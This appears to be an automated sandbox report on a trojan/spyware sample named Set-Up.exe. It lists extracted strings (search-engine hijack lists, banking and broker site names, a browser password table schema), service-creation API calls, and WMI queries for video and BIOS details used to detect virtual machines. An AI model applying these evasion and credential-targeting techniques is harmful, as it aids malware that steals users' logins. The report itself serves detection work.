Source: Set-Up.exe, 00000003.00000003.1454468739.0000000002F88000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rbwbwbr+brbkernel32.dllGetProcAddress3e861e705aac45605af39436b5f841547f87c118d9cb02b6a9552acccbfa46db5363c4d976d7fb31ef5d60eea86fa6318f30fb8c03750915fe8912a96277846b070627bda7be6db1294aff8a8ab82cae46ce0f587c087e61d378068a741ab9e24bb61ff4910491f66799232984f375d8fcb3f40e67920e7f28d7ebf6e8afdd2bee9ca93c16b1ecf85814075ec8ae42a1796f5edac70ebbd1061ef3056ded6a66cd625bf9e808af004b463de6291d7194358b940bd147052226d87a50414524a7f5cf13f3dddf9a851cdaf235dc7b34ab3973a1aeac3253accefd43cb7026e40bc%xGetController: Failed to initialize CoClass DataController with error: GetController: Failed to call GetSeed with error: GetController: Failed to call Initialize with error: _StartService - failed to open SCM_StartService - failed to open service with error code: _StartService - failed to start service with error code: _IsServiceUp - failed to open SCM_IsServiceUp - failed to open service with error code: _IsServiceUp - failed to query service with error code: ws2_32.dllWSCEnumProtocols64GetProviders: Unable to enumerate catalog!SafeIPSYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64PackedCatalogItemSafeIPSYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_EntriesLastKnownGoodSYSTEM\SelectSYSTEM\ControlSet0064\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_EntriesPackedCatalogItemSafeIPtdNtQueryInformationProcessNTDLL.DLLCOperationsManager::InitDownloadThreadSafeIPS.exe started (V23.5.7Time since boot: 64bitOS: OS: COperationsManager::InitCOperationsManagerShutting down execution threadsShutting down execution threads (stats)Shutting down execution threads (saving stats)SafeIPS.exe by went down (V23.5.7StatSaveSafeIPS.logpmonpmonppmonpmonppmonGoing to save data (ClearInfoForP)ClearInfoForP Error , , rbSaved FF storeFailed to load FF storeLoaded FF storeFailed to load additional FF storeLoaded additional FF storeTimeout iterating FF storeCOperationsManager::GetINIFile - Service not installed!COperationsManager::DeleteINIFile - Service not installed!SafeIPSSafeIPSclientnotifyGoing to notify serveruserguidclientnotifyparamsLast stop - Finished), trying to remove!Found DLL (!Removed PavTrc.dllPavSHookWow.dllPavLspHookWow.dllPavSHook.dllPavLspHook.dllCOperationsManager::CheckProxy - Added process: COperationsManager::CheckProxy - Added hard include process: COperationsManager::CheckProxy with error: COperationsManager::ExecuteFile - Failed to run: COperationsManager::ExecuteFile - Timeout waiting for process with error: COperationsManager::ExecuteFile - Failed to delete: 127.0.0.1127.0.0.1127.0.0.1SafeIPS.exeCOperationsManager::GetAllUsers - Failed to get key with error: S-1-5-18S-1-5-19S-1-5-20Network interface change\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnableProxyServer;httphttpshttphttpsrb\VarFileInfo\Translation\StringFileInfo\%04x%04x\OriginalFilenamerbkkSYSTEM\CurrentControlSet\Services - Failed to get key with error: SafeIPSImagePath\AppID\AppIDAppID\kp1\Va
Source: Set-Up.exe, 00000003.00000000.1278989299.0000000000793000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: rbwbwbr+brbkernel32.dllGetProcAddress3e861e705aac45605af39436b5f841547f87c118d9cb02b6a9552acccbfa46db5363c4d976d7fb31ef5d60eea86fa6318f30fb8c03750915fe8912a96277846b070627bda7be6db1294aff8a8ab82cae46ce0f587c087e61d378068a741ab9e24bb61ff4910491f66799232984f375d8fcb3f40e67920e7f28d7ebf6e8afdd2bee9ca93c16b1ecf85814075ec8ae42a1796f5edac70ebbd1061ef3056ded6a66cd625bf9e808af004b463de6291d7194358b940bd147052226d87a50414524a7f5cf13f3dddf9a851cdaf235dc7b34ab3973a1aeac3253accefd43cb7026e40bc%xGetController: Failed to initialize CoClass DataController with error: GetController: Failed to call GetSeed with error: GetController: Failed to call Initialize with error: _StartService - failed to open SCM_StartService - failed to open service with error code: _StartService - failed to start service with error code: _IsServiceUp - failed to open SCM_IsServiceUp - failed to open service with error code: _IsServiceUp - failed to query service with error code: ws2_32.dllWSCEnumProtocols64GetProviders: Unable to enumerate catalog!SafeIPSYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64PackedCatalogItemSafeIPSYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_EntriesLastKnownGoodSYSTEM\SelectSYSTEM\ControlSet0064\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_EntriesPackedCatalogItemSafeIPtdNtQueryInformationProcessNTDLL.DLLCOperationsManager::InitDownloadThreadSafeIPS.exe started (V23.5.7Time since boot: 64bitOS: OS: COperationsManager::InitCOperationsManagerShutting down execution threadsShutting down execution threads (stats)Shutting down execution threads (saving stats)SafeIPS.exe by went down (V23.5.7StatSaveSafeIPS.logpmonpmonppmonpmonppmonGoing to save data (ClearInfoForP)ClearInfoForP Error , , rbSaved FF storeFailed to load FF storeLoaded FF storeFailed to load additional FF storeLoaded additional FF storeTimeout iterating FF storeCOperationsManager::GetINIFile - Service not installed!COperationsManager::DeleteINIFile - Service not installed!SafeIPSSafeIPSclientnotifyGoing to notify serveruserguidclientnotifyparamsLast stop - Finished), trying to remove!Found DLL (!Removed PavTrc.dllPavSHookWow.dllPavLspHookWow.dllPavSHook.dllPavLspHook.dllCOperationsManager::CheckProxy - Added process: COperationsManager::CheckProxy - Added hard include process: COperationsManager::CheckProxy with error: COperationsManager::ExecuteFile - Failed to run: COperationsManager::ExecuteFile - Timeout waiting for process with error: COperationsManager::ExecuteFile - Failed to delete: 127.0.0.1127.0.0.1127.0.0.1SafeIPS.exeCOperationsManager::GetAllUsers - Failed to get key with error: S-1-5-18S-1-5-19S-1-5-20Network interface change\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnableProxyServer;httphttpshttphttpsrb\VarFileInfo\Translation\StringFileInfo\%04x%04x\OriginalFilenamerbkkSYSTEM\CurrentControlSet\Services - Failed to get key with error: SafeIPSImagePath\AppID\AppIDAppID\kp1\Va
Source: Set-Up.exe, 00000003.00000003.1454468739.000000000304E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Set-Up.exe
Source: Set-Up.exe	Binary or memory string: rbwbwbr+brbkernel32.dllGetProcAddress3e861e705aac45605af39436b5f841547f87c118d9cb02b6a9552acccbfa46db5363c4d976d7fb31ef5d60eea86fa6318f30fb8c03750915fe8912a96277846b070627bda7be6db1294aff8a8ab82cae46ce0f587c087e61d378068a741ab9e24bb61ff4910491f66799232984f375d8fcb3f40e67920e7f28d7ebf6e8afdd2bee9ca93c16b1ecf85814075ec8ae42a1796f5edac70ebbd1061ef3056ded6a66cd625bf9e808af004b463de6291d7194358b940bd147052226d87a50414524a7f5cf13f3dddf9a851cdaf235dc7b34ab3973a1aeac3253accefd43cb7026e40bc%xGetController: Failed to initialize CoClass DataController with error: GetController: Failed to call GetSeed with error: GetController: Failed to call Initialize with error: _StartService - failed to open SCM_StartService - failed to open service with error code: _StartService - failed to start service with error code: _IsServiceUp - failed to open SCM_IsServiceUp - failed to open service with error code: _IsServiceUp - failed to query service with error code: ws2_32.dllWSCEnumProtocols64GetProviders: Unable to enumerate catalog!SafeIPSYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64PackedCatalogItemSafeIPSYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_EntriesLastKnownGoodSYSTEM\SelectSYSTEM\ControlSet0064\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_EntriesPackedCatalogItemSafeIPtdNtQueryInformationProcessNTDLL.DLLCOperationsManager::InitDownloadThreadSafeIPS.exe started (V23.5.7Time since boot: 64bitOS: OS: COperationsManager::InitCOperationsManagerShutting down execution threadsShutting down execution threads (stats)Shutting down execution threads (saving stats)SafeIPS.exe by went down (V23.5.7StatSaveSafeIPS.logpmonpmonppmonpmonppmonGoing to save data (ClearInfoForP)ClearInfoForP Error , , rbSaved FF storeFailed to load FF storeLoaded FF storeFailed to load additional FF storeLoaded additional FF storeTimeout iterating FF storeCOperationsManager::GetINIFile - Service not installed!COperationsManager::DeleteINIFile - Service not installed!SafeIPSSafeIPSclientnotifyGoing to notify serveruserguidclientnotifyparamsLast stop - Finished), trying to remove!Found DLL (!Removed PavTrc.dllPavSHookWow.dllPavLspHookWow.dllPavSHook.dllPavLspHook.dllCOperationsManager::CheckProxy - Added process: COperationsManager::CheckProxy - Added hard include process: COperationsManager::CheckProxy with error: COperationsManager::ExecuteFile - Failed to run: COperationsManager::ExecuteFile - Timeout waiting for process with error: COperationsManager::ExecuteFile - Failed to delete: 127.0.0.1127.0.0.1127.0.0.1SafeIPS.exeCOperationsManager::GetAllUsers - Failed to get key with error: S-1-5-18S-1-5-19S-1-5-20Network interface change\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnableProxyServer;httphttpshttphttpsrb\VarFileInfo\Translation\StringFileInfo\%04x%04x\OriginalFilenamerbkkSYSTEM\CurrentControlSet\Services - Failed to get key with error: SafeIPSImagePath\AppID\AppIDAppID\kp1\Va
Source: Set-Up.exe	Binary or memory string: OriginalFilename vs Set-Up.exe

Source: Set-Up.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: OpenSCManagerA,CloseServiceHandle,OpenServiceW,CloseServiceHandle,CloseServiceHandle,OpenSCManagerA,GetModuleFileNameW,CreateServiceW,CloseServiceHandle,ChangeServiceConfig2A,ChangeServiceConfig2A,ChangeServiceConfig2A,CloseServiceHandle,CloseServiceHandle,

3_2_00401FB9

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_3_02A84680 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW,

3_3_02A84680

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_2_00401FB9 OpenSCManagerA,CloseServiceHandle,OpenServiceW,CloseServiceHandle,CloseServiceHandle,OpenSCManagerA,GetModuleFileNameW,CreateServiceW,CloseServiceHandle,ChangeServiceConfig2A,ChangeServiceConfig2A,ChangeServiceConfig2A,CloseServiceHandle,CloseServiceHandle,

3_2_00401FB9

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_2_0050A2F0 StartServiceCtrlDispatcherA,

3_2_0050A2F0

Source: Set-Up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-Up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Set-Up.exe, 00000003.00000003.1474778949.0000000003865000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1490135160.000000000386D000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1489836137.0000000003763000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1475457224.0000000003764000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Set-Up.exe

Virustotal: Detection: 8%

Source: Set-Up.exe	String found in binary or memory: optu.search-help.net
Source: Set-Up.exe	String found in binary or memory: Search-Help
Source: Set-Up.exe	String found in binary or memory: ^f2=8000000pref/##/??//googleyoutube.comwww.youtube.comsearch_queryYoutubem.youtube.com/resultsYoutube mobilesearch.yahooyahoo.comvmpYahoowww.ebayebaywww.ebay.comebay.com/sch/i.html_nkweBayflickr.comwww.flickr.comFlickryandex.rubaidu.comwdwordBaiduwww.blip.tvblip.tvBlip TVpinterest.comwww.pinterest.comPinterestsearch.conduit.comConduitsearch.comwww.search.comSearchisearch.babylon.comBabylonwww.wolframalpha.comiWolframalphasearch.goo.ne.jpmtGooszukaj.onet.plOnetsearch.daum.netDaumoptu.search-help.netSearch-Helpsearch.walla.co.ilWallawww.infospace.comwww.zoo.comzoo.comZoowww.mahalo.commahalo.comMahalomystart.facemoods.comsearch.facemoods.comsFacemoodswww.youdao.comyoudao.comYoudaosearch.aol.comAolwww.volunia.comvolunia.comVoluniawww.videos.comvideos.comVideosinfospace.comInfospacewww.soso.comsoso.comwSosowww.hotbot.comhotbot.comHotbotyandex.com.trwww.yandex.com.trwww.yandex.comyandex.comtextYandexIsearch.mywebsearch.comMywebsearchwww.info.cominfo.comqkwInfosearch.lycos.comLycoswww.goodsearch.comgoodsearch.comkeywordsGoodSearchdeeperweb.comDeeperwebwww.metacrawler.commetacrawler.comMetacrawlersearch.v9.comv9.comV9weheartit.comWeheartitmsxml.excite.comExcitewww.entireweb.comentireweb.comEntireWebecosia.orgEcosiasearch.yippy.comYippywww.k9safesearch.comk9safesearch.comK9www.duckduckgo.comduckduckgo.comDuckduckgowww.qwant.comQwantsearch.pch.compchwww.gigablast.comgigablast.comGigablastwww.webopedia.comwebopedia.comWebopediawww.dogpile.comdogpile.comDogpilewebcrawler.comwww.webcrawler.comWebCrawlerask.comwww.ask.comAsksmugsmug.comwww.smugsmug.comSearchWordsSmugmugfotolog.comwww.fotolog.comFotologsearch.myway.comint.search.myway.comsearchforMywaysearch.safehomepage.comsafehomepage.comSafehomepagewww.wiki.com/results1.htmwiki.comvimeo.comwww.vimeo.comVimeowww.photo.netphoto.netwebshots.comwww.webshots.comWebshotstwitpic.comwww.twitpic.com/tagTwitpicwww.najdi.si/najdiNajdiimageshack.uswww.imageshack.us/photosImageshackwww.amfibi.comamfibi.comAmfibiwww.websearch.comwebsearch.comwebsearchwww.picsearch.comPicsearchsearch.seznam.czSeznamnova.rambler.ruRamblerwww.similarsitesearch.comSimilarsitesearchblekko.comBlekkowww.sogou.comsogou.comquerySogouwww.shutterstock.comshutterstock.com/cat.mhtmlsearchtermShutterstocksearch.webssearches.comwebssearches.comWebssearcheswww.chinaso.comchinaso.comChinasowww.fotolia.comfotolia.comkFotoliawww.findamo.comfindamo.comFindamopicasaweb.google.comPicasamedia.photobucket.comphotobucket.comwww.photobucket.comPhotobucketTuvarutwitter.comwww.twitter.comTwittervube.comwww.vube.comVubevideo.so.comimage.so.comso.comwww.so.comSosoku.comwww.soku.com/vkeywordSokusearch.naver.jpsearch.naver.comwww.naver.jpNavertopsy.comwww.topsy.comTopsygovome.comwww.govome.comGovomesearch.globososo.comglobososo.comwww.globososo.com/webGlobososointernet.comwww.internet.com/listings/Internetwow.comwww.wow.comWowtuvaro.comwww.tuvaro.com/ws/Tuvaromysearchresults.comwww.mysearchresults.com/search.phpMysearchresultsbing.comwww.bing.comstrictadlt/searchBingim
Source: Set-Up.exe	String found in binary or memory: set-addPolicy
Source: Set-Up.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\Set-Up.exe

File read: C:\Users\user\Desktop\Set-Up.exe

Jump to behavior

Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Set-Up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-Up.exe

Static file information: File size 4910680 > 1048576

Source: Set-Up.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x391400

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_2_00402ABD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

3_2_00402ABD

Source: Set-Up.exe

Static PE information: real checksum: 0x27466 should be: 0x4b5d62

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_2_005A168D push ecx; ret

3_2_005A16A0

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_2_0050A2F0 StartServiceCtrlDispatcherA,

3_2_0050A2F0

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_2_006C8FB0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,QueryPerformanceCounter,GetTickCount,GlobalMemoryStatus,GetCurrentProcessId,

3_2_006C8FB0

Source: C:\Users\user\Desktop\Set-Up.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Set-Up.exe PID: 7936, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Set-Up.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Set-Up.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-Up.exe

API coverage: 0.2 %

Source: C:\Users\user\Desktop\Set-Up.exe TID: 6192	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Set-Up.exe TID: 3796	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\Set-Up.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Set-Up.exe

3_2_005B268A

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_2_00403747 _memset,GetLogicalDriveStringsA,

3_2_00403747

Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003768000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Set-Up.exe	Binary or memory string: \\.\VBoxMiniRdrDN
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Set-Up.exe, 00000003.00000003.1563242115.0000000000A7C000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1576334070.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1579945349.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1469745938.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1574598650.0000000000A7C000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1536386695.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000002.1579821854.0000000000A53000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000003.00000003.1574148871.0000000000A51000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Set-Up.exe	Binary or memory string: ]0@ntdll.dllRtlGetVersionWindows 95Windows 98Windows MEWindows NTWindows 2000Windows XPWindows 2003Windows VistaWindows 2008Windows 2008R2Windows 7Windows 8Windows 8.1Windows 2012Windows 2012r2Windows 10Windows 2015OtherError getting OS typeWindows95Windows98WindowsMEWindowsNTWindows2000WindowsXPWindows2003WindowsVistaWindows2008Windows2008R2Windows7Windows8Windows8.1Windows2012Windows2012r2Windows10Windows2015OtherError\\.\VBoxMiniRdrDNkernel32.dllGetSystemWow64DirectoryA{FA0F8507-CE4B-45AE-B3E3-2C5F8F9D960C}v
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Set-Up.exe, 00000003.00000003.1490253106.0000000003763000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\Set-Up.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_3_02A8B240 LdrInitializeThunk,

3_3_02A8B240

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_2_00402ABD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

3_2_00402ABD

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: GetLocaleInfoA,

3_2_005C2130

Source: C:\Users\user\Desktop\Set-Up.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_2_005A10CE GetLocalTime,

3_2_005A10CE

